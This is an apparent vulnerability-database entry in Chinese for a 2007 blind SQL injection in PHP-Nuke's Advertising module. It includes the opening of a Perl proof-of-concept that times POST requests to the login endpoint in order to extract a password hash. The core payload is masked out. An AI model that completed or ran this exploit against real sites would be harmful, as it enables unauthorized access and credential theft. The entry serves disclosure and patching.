Exploits PHP-Nuke Module Advertising Blind SQL Injection

基本字段

漏洞编号:
SSV-7478
披露/发现时间:
未知
提交时间:
2007-11-17
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
PHP-Nuke
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.05KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/perl 
#Product: PHP-Nuke Module Advertising
#BugFounder: 0x90
#HomePage: WwW.0x90.COM.Ar
#Problem: Blind SQL Injection
 
use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;
my $host = "http://[url]/modules.php?name=Advertising";
my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(POST => $host);
my $post;
my $inicio;
my $risposta;
my $fine;
my $tiempodefault;
my $tiempo;
my $i;
my $j;
my $hash;
my @array;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$post="login=a&pass=a&op=client_valid";
$tiempodefault=richiesta($post);
$hash="";
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

生命线

  • 发现/披露了漏洞
  • 2007-11-17 提交了漏洞
  • 2007-11-17 提交更新了 PoC

相关漏洞

人气 1086
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负

京ICP备10040895号 京公网安备 11010502034610号 Copyright @ 404 Team from Knownsec. English